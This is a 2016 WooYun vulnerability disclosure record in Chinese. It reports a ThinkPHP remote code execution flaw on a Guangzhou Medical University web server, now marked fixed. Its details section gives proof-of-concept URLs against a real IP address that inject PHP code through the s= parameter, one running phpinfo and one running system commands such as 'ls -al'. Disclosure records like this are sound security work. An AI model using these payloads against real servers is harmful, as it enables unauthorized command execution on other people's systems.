广州医科大学某站任意代码执行漏洞

编号218530
Urlhttp://www.wooyun.org/bug.php?action=view&id=218530
漏洞状态厂商已经修复
漏洞标题广州医科大学某站任意代码执行漏洞
漏洞类型命令执行
厂商gzhmu.edu.cn
白帽子pvop
提交日期2016-06-13 10:21:00
公开日期2016-06-14 08:37:00
修复时间2016-06-14 08:37:00
确认时间2016-06-13 00:00:00
Confirm Spend0
漏洞标签远程代码执行 ThinkPHP
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank20
漏洞简介
thinkphp任意代码执行漏洞
漏洞细节

thinkphp任意代码执行漏洞
直接执行:

http://120.236.166.135:88/?s=/abc/abc/abc/$%[email protected]()%7D

POC

直接执行:

http://120.236.166.135:88/?s=/abc/abc/abc/$%[email protected]()%7D


sql5.PNG


列一下目录:

http://120.236.166.135:88/?s=/abc/abc/abc/%7B$%7Bsystem($_GET[%27x%27])%7D%7D?x=ls%20-al


sql6.PNG

修复方案

打补丁

状态信息 2016-06-13: 细节已通知厂商并且等待厂商处理中
2016-06-13: 厂商已经确认,细节仅向厂商公开
2016-06-14: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复感谢!
回应信息危害等级:高漏洞Rank:20 确认时间:2016-06-13 11:47